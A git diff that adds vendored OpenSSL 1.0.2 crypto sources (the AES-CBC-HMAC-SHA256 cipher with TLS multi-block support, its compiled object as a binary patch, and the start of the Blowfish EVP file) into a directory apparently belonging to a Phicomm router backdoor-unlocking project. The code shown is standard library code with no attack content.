+    } blocks[8];
+    SHA256_MB_CTX *ctx;
+    unsigned int frag, last, packlen, i, x4 = 4 * n4x, minblocks, processed =
+        0;
+    size_t ret = 0;
+    u8 *IVs;
+#   if defined(BSWAP8)
+    u64 seqnum;
+#   endif
+
+    /* ask for IVs in bulk */
+    if (RAND_bytes((IVs = blocks[0].c), 16 * x4) <= 0)
+        return 0;
+
+    /* align */
+    ctx = (SHA256_MB_CTX *) (storage + 32 - ((size_t)storage % 32));
+
+    frag = (unsigned int)inp_len >> (1 + n4x);
+    last = (unsigned int)inp_len + frag - (frag << (1 + n4x));
+    if (last > frag && ((last + 13 + 9) % 64) < (x4 - 1)) {
+        frag++;
+        last -= x4 - 1;
+    }
+
+    packlen = 5 + 16 + ((frag + 32 + 16) & -16);
+
+    /* populate descriptors with pointers and IVs */
+    hash_d[0].ptr = inp;
+    ciph_d[0].inp = inp;
+    /* 5+16 is place for header and explicit IV */
+    ciph_d[0].out = out + 5 + 16;
+    memcpy(ciph_d[0].out - 16, IVs, 16);
+    memcpy(ciph_d[0].iv, IVs, 16);
+    IVs += 16;
+
+    for (i = 1; i < x4; i++) {
+        ciph_d[i].inp = hash_d[i].ptr = hash_d[i - 1].ptr + frag;
+        ciph_d[i].out = ciph_d[i - 1].out + packlen;
+        memcpy(ciph_d[i].out - 16, IVs, 16);
+        memcpy(ciph_d[i].iv, IVs, 16);
+        IVs += 16;
+    }
+
+#   if defined(BSWAP8)
+    memcpy(blocks[0].c, key->md.data, 8);
+    seqnum = BSWAP8(blocks[0].q[0]);
+#   endif
+    for (i = 0; i < x4; i++) {
+        unsigned int len = (i == (x4 - 1) ? last : frag);
+#   if !defined(BSWAP8)
+        unsigned int carry, j;
+#   endif
+
+        ctx->A[i] = key->md.h[0];
+        ctx->B[i] = key->md.h[1];
+        ctx->C[i] = key->md.h[2];
+        ctx->D[i] = key->md.h[3];
+        ctx->E[i] = key->md.h[4];
+        ctx->F[i] = key->md.h[5];
+        ctx->G[i] = key->md.h[6];
+        ctx->H[i] = key->md.h[7];
+
+        /* fix seqnum */
+#   if defined(BSWAP8)
+        blocks[i].q[0] = BSWAP8(seqnum + i);
+#   else
+        for (carry = i, j = 8; j--;) {
+            blocks[i].c[j] = ((u8 *)key->md.data)[j] + carry;
+            carry = (blocks[i].c[j] - carry) >> (sizeof(carry) * 8 - 1);
+        }
+#   endif
+        blocks[i].c[8] = ((u8 *)key->md.data)[8];
+        blocks[i].c[9] = ((u8 *)key->md.data)[9];
+        blocks[i].c[10] = ((u8 *)key->md.data)[10];
+        /* fix length */
+        blocks[i].c[11] = (u8)(len >> 8);
+        blocks[i].c[12] = (u8)(len);
+
+        memcpy(blocks[i].c + 13, hash_d[i].ptr, 64 - 13);
+        hash_d[i].ptr += 64 - 13;
+        hash_d[i].blocks = (len - (64 - 13)) / 64;
+
+        edges[i].ptr = blocks[i].c;
+        edges[i].blocks = 1;
+    }
+
+    /* hash 13-byte headers and first 64-13 bytes of inputs */
+    sha256_multi_block(ctx, edges, n4x);
+    /* hash bulk inputs */
+#   define MAXCHUNKSIZE    2048
+#   if     MAXCHUNKSIZE%64
+#    error  "MAXCHUNKSIZE is not divisible by 64"
+#   elif   MAXCHUNKSIZE
+    /*
+     * goal is to minimize pressure on L1 cache by moving in shorter steps,
+     * so that hashed data is still in the cache by the time we encrypt it
+     */
+    minblocks = ((frag <= last ? frag : last) - (64 - 13)) / 64;
+    if (minblocks > MAXCHUNKSIZE / 64) {
+        for (i = 0; i < x4; i++) {
+            edges[i].ptr = hash_d[i].ptr;
+            edges[i].blocks = MAXCHUNKSIZE / 64;
+            ciph_d[i].blocks = MAXCHUNKSIZE / 16;
+        }
+        do {
+            sha256_multi_block(ctx, edges, n4x);
+            aesni_multi_cbc_encrypt(ciph_d, &key->ks, n4x);
+
+            for (i = 0; i < x4; i++) {
+                edges[i].ptr = hash_d[i].ptr += MAXCHUNKSIZE;
+                hash_d[i].blocks -= MAXCHUNKSIZE / 64;
+                edges[i].blocks = MAXCHUNKSIZE / 64;
+                ciph_d[i].inp += MAXCHUNKSIZE;
+                ciph_d[i].out += MAXCHUNKSIZE;
+                ciph_d[i].blocks = MAXCHUNKSIZE / 16;
+                memcpy(ciph_d[i].iv, ciph_d[i].out - 16, 16);
+            }
+            processed += MAXCHUNKSIZE;
+            minblocks -= MAXCHUNKSIZE / 64;
+        } while (minblocks > MAXCHUNKSIZE / 64);
+    }
+#   endif
+#   undef  MAXCHUNKSIZE
+    sha256_multi_block(ctx, hash_d, n4x);
+
+    memset(blocks, 0, sizeof(blocks));
+    for (i = 0; i < x4; i++) {
+        unsigned int len = (i == (x4 - 1) ? last : frag),
+            off = hash_d[i].blocks * 64;
+        const unsigned char *ptr = hash_d[i].ptr + off;
+
+        off = (len - processed) - (64 - 13) - off; /* remainder actually */
+        memcpy(blocks[i].c, ptr, off);
+        blocks[i].c[off] = 0x80;
+        len += 64 + 13;         /* 64 is HMAC header */
+        len *= 8;               /* convert to bits */
+        if (off < (64 - 8)) {
+#   ifdef BSWAP4
+            blocks[i].d[15] = BSWAP4(len);
+#   else
+            PUTU32(blocks[i].c + 60, len);
+#   endif
+            edges[i].blocks = 1;
+        } else {
+#   ifdef BSWAP4
+            blocks[i].d[31] = BSWAP4(len);
+#   else
+            PUTU32(blocks[i].c + 124, len);
+#   endif
+            edges[i].blocks = 2;
+        }
+        edges[i].ptr = blocks[i].c;
+    }
+
+    /* hash input tails and finalize */
+    sha256_multi_block(ctx, edges, n4x);
+
+    memset(blocks, 0, sizeof(blocks));
+    for (i = 0; i < x4; i++) {
+#   ifdef BSWAP4
+        blocks[i].d[0] = BSWAP4(ctx->A[i]);
+        ctx->A[i] = key->tail.h[0];
+        blocks[i].d[1] = BSWAP4(ctx->B[i]);
+        ctx->B[i] = key->tail.h[1];
+        blocks[i].d[2] = BSWAP4(ctx->C[i]);
+        ctx->C[i] = key->tail.h[2];
+        blocks[i].d[3] = BSWAP4(ctx->D[i]);
+        ctx->D[i] = key->tail.h[3];
+        blocks[i].d[4] = BSWAP4(ctx->E[i]);
+        ctx->E[i] = key->tail.h[4];
+        blocks[i].d[5] = BSWAP4(ctx->F[i]);
+        ctx->F[i] = key->tail.h[5];
+        blocks[i].d[6] = BSWAP4(ctx->G[i]);
+        ctx->G[i] = key->tail.h[6];
+        blocks[i].d[7] = BSWAP4(ctx->H[i]);
+        ctx->H[i] = key->tail.h[7];
+        blocks[i].c[32] = 0x80;
+        blocks[i].d[15] = BSWAP4((64 + 32) * 8);
+#   else
+        PUTU32(blocks[i].c + 0, ctx->A[i]);
+        ctx->A[i] = key->tail.h[0];
+        PUTU32(blocks[i].c + 4, ctx->B[i]);
+        ctx->B[i] = key->tail.h[1];
+        PUTU32(blocks[i].c + 8, ctx->C[i]);
+        ctx->C[i] = key->tail.h[2];
+        PUTU32(blocks[i].c + 12, ctx->D[i]);
+        ctx->D[i] = key->tail.h[3];
+        PUTU32(blocks[i].c + 16, ctx->E[i]);
+        ctx->E[i] = key->tail.h[4];
+        PUTU32(blocks[i].c + 20, ctx->F[i]);
+        ctx->F[i] = key->tail.h[5];
+        PUTU32(blocks[i].c + 24, ctx->G[i]);
+        ctx->G[i] = key->tail.h[6];
+        PUTU32(blocks[i].c + 28, ctx->H[i]);
+        ctx->H[i] = key->tail.h[7];
+        blocks[i].c[32] = 0x80;
+        PUTU32(blocks[i].c + 60, (64 + 32) * 8);
+#   endif
+        edges[i].ptr = blocks[i].c;
+        edges[i].blocks = 1;
+    }
+
+    /* finalize MACs */
+    sha256_multi_block(ctx, edges, n4x);
+
+    for (i = 0; i < x4; i++) {
+        unsigned int len = (i == (x4 - 1) ? last : frag), pad, j;
+        unsigned char *out0 = out;
+
+        memcpy(ciph_d[i].out, ciph_d[i].inp, len - processed);
+        ciph_d[i].inp = ciph_d[i].out;
+
+        out += 5 + 16 + len;
+
+        /* write MAC */
+        PUTU32(out + 0, ctx->A[i]);
+        PUTU32(out + 4, ctx->B[i]);
+        PUTU32(out + 8, ctx->C[i]);
+        PUTU32(out + 12, ctx->D[i]);
+        PUTU32(out + 16, ctx->E[i]);
+        PUTU32(out + 20, ctx->F[i]);
+        PUTU32(out + 24, ctx->G[i]);
+        PUTU32(out + 28, ctx->H[i]);
+        out += 32;
+        len += 32;
+
+        /* pad */
+        pad = 15 - len % 16;
+        for (j = 0; j <= pad; j++)
+            *(out++) = pad;
+        len += pad + 1;
+
+        ciph_d[i].blocks = (len - processed) / 16;
+        len += 16;              /* account for explicit iv */
+
+        /* arrange header */
+        out0[0] = ((u8 *)key->md.data)[8];
+        out0[1] = ((u8 *)key->md.data)[9];
+        out0[2] = ((u8 *)key->md.data)[10];
+        out0[3] = (u8)(len >> 8);
+        out0[4] = (u8)(len);
+
+        ret += len + 5;
+        inp += frag;
+    }
+
+    aesni_multi_cbc_encrypt(ciph_d, &key->ks, n4x);
+
+    OPENSSL_cleanse(blocks, sizeof(blocks));
+    OPENSSL_cleanse(ctx, sizeof(*ctx));
+
+    return ret;
+}
+#  endif
+
+static int aesni_cbc_hmac_sha256_cipher(EVP_CIPHER_CTX *ctx,
+                                        unsigned char *out,
+                                        const unsigned char *in, size_t len)
+{
+    EVP_AES_HMAC_SHA256 *key = data(ctx);
+    unsigned int l;
+    size_t plen = key->payload_length, iv = 0, /* explicit IV in TLS 1.1 and
+                                                * later */
+        sha_off = 0;
+#  if defined(STITCHED_CALL)
+    size_t aes_off = 0, blocks;
+
+    sha_off = SHA256_CBLOCK - key->md.num;
+#  endif
+
+    key->payload_length = NO_PAYLOAD_LENGTH;
+
+    if (len % AES_BLOCK_SIZE)
+        return 0;
+
+    if (ctx->encrypt) {
+        if (plen == NO_PAYLOAD_LENGTH)
+            plen = len;
+        else if (len !=
+                 ((plen + SHA256_DIGEST_LENGTH +
+                   AES_BLOCK_SIZE) & -AES_BLOCK_SIZE))
+            return 0;
+        else if (key->aux.tls_ver >= TLS1_1_VERSION)
+            iv = AES_BLOCK_SIZE;
+
+#  if defined(STITCHED_CALL)
+        if (OPENSSL_ia32cap_P[1] & (1 << (60 - 32)) && /* AVX? */
+            plen > (sha_off + iv) &&
+            (blocks = (plen - (sha_off + iv)) / SHA256_CBLOCK)) {
+            SHA256_Update(&key->md, in + iv, sha_off);
+
+            (void)aesni_cbc_sha256_enc(in, out, blocks, &key->ks,
+                                       ctx->iv, &key->md, in + iv + sha_off);
+            blocks *= SHA256_CBLOCK;
+            aes_off += blocks;
+            sha_off += blocks;
+            key->md.Nh += blocks >> 29;
+            key->md.Nl += blocks <<= 3;
+            if (key->md.Nl < (unsigned int)blocks)
+                key->md.Nh++;
+        } else {
+            sha_off = 0;
+        }
+#  endif
+        sha_off += iv;
+        SHA256_Update(&key->md, in + sha_off, plen - sha_off);
+
+        if (plen != len) {      /* "TLS" mode of operation */
+            if (in != out)
+                memcpy(out + aes_off, in + aes_off, plen - aes_off);
+
+            /* calculate HMAC and append it to payload */
+            SHA256_Final(out + plen, &key->md);
+            key->md = key->tail;
+            SHA256_Update(&key->md, out + plen, SHA256_DIGEST_LENGTH);
+            SHA256_Final(out + plen, &key->md);
+
+            /* pad the payload|hmac */
+            plen += SHA256_DIGEST_LENGTH;
+            for (l = len - plen - 1; plen < len; plen++)
+                out[plen] = l;
+            /* encrypt HMAC|padding at once */
+            aesni_cbc_encrypt(out + aes_off, out + aes_off, len - aes_off,
+                              &key->ks, ctx->iv, 1);
+        } else {
+            aesni_cbc_encrypt(in + aes_off, out + aes_off, len - aes_off,
+                              &key->ks, ctx->iv, 1);
+        }
+    } else {
+        union {
+            unsigned int u[SHA256_DIGEST_LENGTH / sizeof(unsigned int)];
+            unsigned char c[64 + SHA256_DIGEST_LENGTH];
+        } mac, *pmac;
+
+        /* arrange cache line alignment */
+        pmac = (void *)(((size_t)mac.c + 63) & ((size_t)0 - 64));
+
+        /* decrypt HMAC|padding at once */
+        aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0);
+
+        if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */
+            size_t inp_len, mask, j, i;
+            unsigned int res, maxpad, pad, bitlen;
+            int ret = 1;
+            union {
+                unsigned int u[SHA_LBLOCK];
+                unsigned char c[SHA256_CBLOCK];
+            } *data = (void *)key->md.data;
+
+            if ((key->aux.tls_aad[plen - 4] << 8 | key->aux.tls_aad[plen - 3])
+                >= TLS1_1_VERSION)
+                iv = AES_BLOCK_SIZE;
+
+            if (len < (iv + SHA256_DIGEST_LENGTH + 1))
+                return 0;
+
+            /* omit explicit iv */
+            out += iv;
+            len -= iv;
+
+            /* figure out payload length */
+            pad = out[len - 1];
+            maxpad = len - (SHA256_DIGEST_LENGTH + 1);
+            maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8);
+            maxpad &= 255;
+
+            inp_len = len - (SHA256_DIGEST_LENGTH + pad + 1);
+            mask = (0 - ((inp_len - len) >> (sizeof(inp_len) * 8 - 1)));
+            inp_len &= mask;
+            ret &= (int)mask;
+
+            key->aux.tls_aad[plen - 2] = inp_len >> 8;
+            key->aux.tls_aad[plen - 1] = inp_len;
+
+            /* calculate HMAC */
+            key->md = key->head;
+            SHA256_Update(&key->md, key->aux.tls_aad, plen);
+
+#  if 1
+            len -= SHA256_DIGEST_LENGTH; /* amend mac */
+            if (len >= (256 + SHA256_CBLOCK)) {
+                j = (len - (256 + SHA256_CBLOCK)) & (0 - SHA256_CBLOCK);
+                j += SHA256_CBLOCK - key->md.num;
+                SHA256_Update(&key->md, out, j);
+                out += j;
+                len -= j;
+                inp_len -= j;
+            }
+
+            /* but pretend as if we hashed padded payload */
+            bitlen = key->md.Nl + (inp_len << 3); /* at most 18 bits */
+#   ifdef BSWAP4
+            bitlen = BSWAP4(bitlen);
+#   else
+            mac.c[0] = 0;
+            mac.c[1] = (unsigned char)(bitlen >> 16);
+            mac.c[2] = (unsigned char)(bitlen >> 8);
+            mac.c[3] = (unsigned char)bitlen;
+            bitlen = mac.u[0];
+#   endif
+
+            pmac->u[0] = 0;
+            pmac->u[1] = 0;
+            pmac->u[2] = 0;
+            pmac->u[3] = 0;
+            pmac->u[4] = 0;
+            pmac->u[5] = 0;
+            pmac->u[6] = 0;
+            pmac->u[7] = 0;
+
+            for (res = key->md.num, j = 0; j < len; j++) {
+                size_t c = out[j];
+                mask = (j - inp_len) >> (sizeof(j) * 8 - 8);
+                c &= mask;
+                c |= 0x80 & ~mask & ~((inp_len - j) >> (sizeof(j) * 8 - 8));
+                data->c[res++] = (unsigned char)c;
+
+                if (res != SHA256_CBLOCK)
+                    continue;
+
+                /* j is not incremented yet */
+                mask = 0 - ((inp_len + 7 - j) >> (sizeof(j) * 8 - 1));
+                data->u[SHA_LBLOCK - 1] |= bitlen & mask;
+                sha256_block_data_order(&key->md, data, 1);
+                mask &= 0 - ((j - inp_len - 72) >> (sizeof(j) * 8 - 1));
+                pmac->u[0] |= key->md.h[0] & mask;
+                pmac->u[1] |= key->md.h[1] & mask;
+                pmac->u[2] |= key->md.h[2] & mask;
+                pmac->u[3] |= key->md.h[3] & mask;
+                pmac->u[4] |= key->md.h[4] & mask;
+                pmac->u[5] |= key->md.h[5] & mask;
+                pmac->u[6] |= key->md.h[6] & mask;
+                pmac->u[7] |= key->md.h[7] & mask;
+                res = 0;
+            }
+
+            for (i = res; i < SHA256_CBLOCK; i++, j++)
+                data->c[i] = 0;
+
+            if (res > SHA256_CBLOCK - 8) {
+                mask = 0 - ((inp_len + 8 - j) >> (sizeof(j) * 8 - 1));
+                data->u[SHA_LBLOCK - 1] |= bitlen & mask;
+                sha256_block_data_order(&key->md, data, 1);
+                mask &= 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1));
+                pmac->u[0] |= key->md.h[0] & mask;
+                pmac->u[1] |= key->md.h[1] & mask;
+                pmac->u[2] |= key->md.h[2] & mask;
+                pmac->u[3] |= key->md.h[3] & mask;
+                pmac->u[4] |= key->md.h[4] & mask;
+                pmac->u[5] |= key->md.h[5] & mask;
+                pmac->u[6] |= key->md.h[6] & mask;
+                pmac->u[7] |= key->md.h[7] & mask;
+
+                memset(data, 0, SHA256_CBLOCK);
+                j += 64;
+            }
+            data->u[SHA_LBLOCK - 1] = bitlen;
+            sha256_block_data_order(&key->md, data, 1);
+            mask = 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1));
+            pmac->u[0] |= key->md.h[0] & mask;
+            pmac->u[1] |= key->md.h[1] & mask;
+            pmac->u[2] |= key->md.h[2] & mask;
+            pmac->u[3] |= key->md.h[3] & mask;
+            pmac->u[4] |= key->md.h[4] & mask;
+            pmac->u[5] |= key->md.h[5] & mask;
+            pmac->u[6] |= key->md.h[6] & mask;
+            pmac->u[7] |= key->md.h[7] & mask;
+
+#   ifdef BSWAP4
+            pmac->u[0] = BSWAP4(pmac->u[0]);
+            pmac->u[1] = BSWAP4(pmac->u[1]);
+            pmac->u[2] = BSWAP4(pmac->u[2]);
+            pmac->u[3] = BSWAP4(pmac->u[3]);
+            pmac->u[4] = BSWAP4(pmac->u[4]);
+            pmac->u[5] = BSWAP4(pmac->u[5]);
+            pmac->u[6] = BSWAP4(pmac->u[6]);
+            pmac->u[7] = BSWAP4(pmac->u[7]);
+#   else
+            for (i = 0; i < 8; i++) {
+                res = pmac->u[i];
+                pmac->c[4 * i + 0] = (unsigned char)(res >> 24);
+                pmac->c[4 * i + 1] = (unsigned char)(res >> 16);
+                pmac->c[4 * i + 2] = (unsigned char)(res >> 8);
+                pmac->c[4 * i + 3] = (unsigned char)res;
+            }
+#   endif
+            len += SHA256_DIGEST_LENGTH;
+#  else
+            SHA256_Update(&key->md, out, inp_len);
+            res = key->md.num;
+            SHA256_Final(pmac->c, &key->md);
+
+            {
+                unsigned int inp_blocks, pad_blocks;
+
+                /* but pretend as if we hashed padded payload */
+                inp_blocks =
+                    1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1));
+                res += (unsigned int)(len - inp_len);
+                pad_blocks = res / SHA256_CBLOCK;
+                res %= SHA256_CBLOCK;
+                pad_blocks +=
+                    1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1));
+                for (; inp_blocks < pad_blocks; inp_blocks++)
+                    sha1_block_data_order(&key->md, data, 1);
+            }
+#  endif
+            key->md = key->tail;
+            SHA256_Update(&key->md, pmac->c, SHA256_DIGEST_LENGTH);
+            SHA256_Final(pmac->c, &key->md);
+
+            /* verify HMAC */
+            out += inp_len;
+            len -= inp_len;
+#  if 1
+            {
+                unsigned char *p =
+                    out + len - 1 - maxpad - SHA256_DIGEST_LENGTH;
+                size_t off = out - p;
+                unsigned int c, cmask;
+
+                maxpad += SHA256_DIGEST_LENGTH;
+                for (res = 0, i = 0, j = 0; j < maxpad; j++) {
+                    c = p[j];
+                    cmask =
+                        ((int)(j - off - SHA256_DIGEST_LENGTH)) >>
+                        (sizeof(int) * 8 - 1);
+                    res |= (c ^ pad) & ~cmask; /* ... and padding */
+                    cmask &= ((int)(off - 1 - j)) >> (sizeof(int) * 8 - 1);
+                    res |= (c ^ pmac->c[i]) & cmask;
+                    i += 1 & cmask;
+                }
+                maxpad -= SHA256_DIGEST_LENGTH;
+
+                res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1));
+                ret &= (int)~res;
+            }
+#  else
+            for (res = 0, i = 0; i < SHA256_DIGEST_LENGTH; i++)
+                res |= out[i] ^ pmac->c[i];
+            res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1));
+            ret &= (int)~res;
+
+            /* verify padding */
+            pad = (pad & ~res) | (maxpad & res);
+            out = out + len - 1 - pad;
+            for (res = 0, i = 0; i < pad; i++)
+                res |= out[i] ^ pad;
+
+            res = (0 - res) >> (sizeof(res) * 8 - 1);
+            ret &= (int)~res;
+#  endif
+            return ret;
+        } else {
+            SHA256_Update(&key->md, out, len);
+        }
+    }
+
+    return 1;
+}
+
+static int aesni_cbc_hmac_sha256_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg,
+                                      void *ptr)
+{
+    EVP_AES_HMAC_SHA256 *key = data(ctx);
+
+    switch (type) {
+    case EVP_CTRL_AEAD_SET_MAC_KEY:
+        {
+            unsigned int i;
+            unsigned char hmac_key[64];
+
+            memset(hmac_key, 0, sizeof(hmac_key));
+
+            if (arg > (int)sizeof(hmac_key)) {
+                SHA256_Init(&key->head);
+                SHA256_Update(&key->head, ptr, arg);
+                SHA256_Final(hmac_key, &key->head);
+            } else {
+                memcpy(hmac_key, ptr, arg);
+            }
+
+            for (i = 0; i < sizeof(hmac_key); i++)
+                hmac_key[i] ^= 0x36; /* ipad */
+            SHA256_Init(&key->head);
+            SHA256_Update(&key->head, hmac_key, sizeof(hmac_key));
+
+            for (i = 0; i < sizeof(hmac_key); i++)
+                hmac_key[i] ^= 0x36 ^ 0x5c; /* opad */
+            SHA256_Init(&key->tail);
+            SHA256_Update(&key->tail, hmac_key, sizeof(hmac_key));
+
+            OPENSSL_cleanse(hmac_key, sizeof(hmac_key));
+
+            return 1;
+        }
+    case EVP_CTRL_AEAD_TLS1_AAD:
+        {
+            unsigned char *p = ptr;
+            unsigned int len = p[arg - 2] << 8 | p[arg - 1];
+
+            if (ctx->encrypt) {
+                key->payload_length = len;
+                if ((key->aux.tls_ver =
+                     p[arg - 4] << 8 | p[arg - 3]) >= TLS1_1_VERSION) {
+                    len -= AES_BLOCK_SIZE;
+                    p[arg - 2] = len >> 8;
+                    p[arg - 1] = len;
+                }
+                key->md = key->head;
+                SHA256_Update(&key->md, p, arg);
+
+                return (int)(((len + SHA256_DIGEST_LENGTH +
+                               AES_BLOCK_SIZE) & -AES_BLOCK_SIZE)
+                             - len);
+            } else {
+                if (arg > 13)
+                    arg = 13;
+                memcpy(key->aux.tls_aad, ptr, arg);
+                key->payload_length = arg;
+
+                return SHA256_DIGEST_LENGTH;
+            }
+        }
+#  if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_MAX_BUFSIZE:
+        return (int)(5 + 16 + ((arg + 32 + 16) & -16));
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_AAD:
+        {
+            EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *param =
+                (EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *) ptr;
+            unsigned int n4x = 1, x4;
+            unsigned int frag, last, packlen, inp_len;
+
+            if (arg < (int)sizeof(EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM))
+                return -1;
+
+            inp_len = param->inp[11] << 8 | param->inp[12];
+
+            if (ctx->encrypt) {
+                if ((param->inp[9] << 8 | param->inp[10]) < TLS1_1_VERSION)
+                    return -1;
+
+                if (inp_len) {
+                    if (inp_len < 4096)
+                        return 0; /* too short */
+
+                    if (inp_len >= 8192 && OPENSSL_ia32cap_P[2] & (1 << 5))
+                        n4x = 2; /* AVX2 */
+                } else if ((n4x = param->interleave / 4) && n4x <= 2)
+                    inp_len = param->len;
+                else
+                    return -1;
+
+                key->md = key->head;
+                SHA256_Update(&key->md, param->inp, 13);
+
+                x4 = 4 * n4x;
+                n4x += 1;
+
+                frag = inp_len >> n4x;
+                last = inp_len + frag - (frag << n4x);
+                if (last > frag && ((last + 13 + 9) % 64 < (x4 - 1))) {
+                    frag++;
+                    last -= x4 - 1;
+                }
+
+                packlen = 5 + 16 + ((frag + 32 + 16) & -16);
+                packlen = (packlen << n4x) - packlen;
+                packlen += 5 + 16 + ((last + 32 + 16) & -16);
+
+                param->interleave = x4;
+
+                return (int)packlen;
+            } else
+                return -1;      /* not yet */
+        }
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_ENCRYPT:
+        {
+            EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *param =
+                (EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM *) ptr;
+
+            return (int)tls1_1_multi_block_encrypt(key, param->out,
+                                                   param->inp, param->len,
+                                                   param->interleave / 4);
+        }
+    case EVP_CTRL_TLS1_1_MULTIBLOCK_DECRYPT:
+#  endif
+    default:
+        return -1;
+    }
+}
+
+static EVP_CIPHER aesni_128_cbc_hmac_sha256_cipher = {
+#  ifdef NID_aes_128_cbc_hmac_sha256
+    NID_aes_128_cbc_hmac_sha256,
+#  else
+    NID_undef,
+#  endif
+    16, 16, 16,
+    EVP_CIPH_CBC_MODE | EVP_CIPH_FLAG_DEFAULT_ASN1 |
+        EVP_CIPH_FLAG_AEAD_CIPHER | EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK,
+    aesni_cbc_hmac_sha256_init_key,
+    aesni_cbc_hmac_sha256_cipher,
+    NULL,
+    sizeof(EVP_AES_HMAC_SHA256),
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_set_asn1_iv,
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_get_asn1_iv,
+    aesni_cbc_hmac_sha256_ctrl,
+    NULL
+};
+
+static EVP_CIPHER aesni_256_cbc_hmac_sha256_cipher = {
+#  ifdef NID_aes_256_cbc_hmac_sha256
+    NID_aes_256_cbc_hmac_sha256,
+#  else
+    NID_undef,
+#  endif
+    16, 32, 16,
+    EVP_CIPH_CBC_MODE | EVP_CIPH_FLAG_DEFAULT_ASN1 |
+        EVP_CIPH_FLAG_AEAD_CIPHER | EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK,
+    aesni_cbc_hmac_sha256_init_key,
+    aesni_cbc_hmac_sha256_cipher,
+    NULL,
+    sizeof(EVP_AES_HMAC_SHA256),
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_set_asn1_iv,
+    EVP_CIPH_FLAG_DEFAULT_ASN1 ? NULL : EVP_CIPHER_get_asn1_iv,
+    aesni_cbc_hmac_sha256_ctrl,
+    NULL
+};
+
+const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha256(void)
+{
+    return ((OPENSSL_ia32cap_P[1] & AESNI_CAPABLE) &&
+            aesni_cbc_sha256_enc(NULL, NULL, 0, NULL, NULL, NULL, NULL) ?
+            &aesni_128_cbc_hmac_sha256_cipher : NULL);
+}
+
+const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha256(void)
+{
+    return ((OPENSSL_ia32cap_P[1] & AESNI_CAPABLE) &&
+            aesni_cbc_sha256_enc(NULL, NULL, 0, NULL, NULL, NULL, NULL) ?
+            &aesni_256_cbc_hmac_sha256_cipher : NULL);
+}
+# else
+const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha256(void)
+{
+    return NULL;
+}
+
+const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha256(void)
+{
+    return NULL;
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha256.o
new file mode 100644
index 0000000000000000000000000000000000000000..642452877c1c7043b2e9156e1bb369e649b2c1aa
GIT binary patch
literal 1496
zcmbtT%}x|S5UycRRwatW0|sN(lNzP7yMPD>GYMI^7@{T^FJ{s^G;D&iyP4@tSP#M@
z_y{}-i7(-iqgUh2i&V{4&9*&z(n@;1s;}znuKt<R_UoOQAONudUcn?17U28L#E%L$
zf_b<FzwSKz-Msk50K41UTlFXVong-o>zis-HCCD%!y;^cX*E=1?dh17*=EsMz;O-7
z?%qD&G8e>!ILPje0fNu(AUIhFmgnbcU$H^bJmB0MBXJFn<FEp>$65IKr;<P-oO%Mp
zJBQ#1!?Ih4EastIRV{?;RT7yHWG8>8L+sSI`$#N0eTs6Od5HzV#M<O>(n;cOs*^bH
z>el)Tl|cLbn<CR}z4WtX4l64;Zm7;kC*z*Zn#Y%YsC<-K-2s)`Y>Zv;tU0lu4z$&v
zI(ZH%>8GjbA=m3$qwsmG<W?ug93S<DYLN8@CbJ_@nfauZ>BfhdP7N>qAFzyCdL#Z#
zMLg$iMgjkyd4vh#<Q+@ho;V)*`p1~B;rLhmbJWtD@;{(kn5_Ry2u4|7klvB_Zt2Jk
z9N({PV~+0JeG^oEMjy0#@tu5VudaQ>fadh|=Ufyq3i$dDn4rHVk^;tvCzNx!fjspo
x`X#QLwl<|MIbY)q-^7^a@b$#`cSq76tb0p=V@#LKUG%2u2i*TrSvhum{S~){WRU;>

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.c
new file mode 100644
index 0000000..d6a0178
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_bf.c
@@ -0,0 +1,87 @@
+/* crypto/evp/e_bf.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
